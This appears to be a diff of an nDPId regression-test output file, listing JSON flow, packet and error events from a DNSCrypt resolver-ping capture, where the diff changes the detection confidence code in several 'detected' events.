-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":490,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739391046} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":490,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYcAuX4RC\/UKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYlAAH4Ryt8KAAABi2PeSOgIIPsCCCyCmlUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYogAH4R5x4KAAABi2PeSMKEIPsGBMwAmlgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":493,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739391046} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":493,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYoAuX4RC\/IKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":946739391306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739391306,"pkt":"ZmZmZmZmRERERERECABFAADSWtFAACoRyuGLY95ICgAAASD7snIAvm5FmleBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAAR0hTbelwStbUvrsyN4TMcjd6ciaJLWS\/+lAjdb\/qhY\/GqLYEoO6rv\/+JZlrPe5rwefrjN2pIualeqx6XQ1AD9Zj2kPVDPuO2VaFeIl38Qe5+u3sSCCBiqzaCgrP\/G5+1mPaQ9UM+44AAAABX1NQIl9UoaI="} 
@@ -997,53 +997,53 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":946739391308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739391308,"pkt":"ZmZmZmZmRERERERECABFAADSWtJAACoRyuCLY95ICgAAASD76AgAvjixmlWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAAR0hTbelwStbUvrsyN4TMcjd6ciaJLWS\/+lAjdb\/qhY\/GqLYEoO6rv\/+JZlrPe5rwefrjN2pIualeqx6XQ1AD9Zj2kPVDPuO2VaFeIl38Qe5+u3sSCCBiqzaCgrP\/G5+1mPaQ9UM+44AAAABX1NQIl9UoaI="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEJAAH4RqpMKAAABkFtq47ysAbsCCL4UZl4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEMgAH4RxtIKAAABkFtq46CUAbsGBGABZlsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":499,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396047} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":499,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEMAuX4R66UKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEQgAH4RxtEKAAABkFtq47xtAbsGBEQqZlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA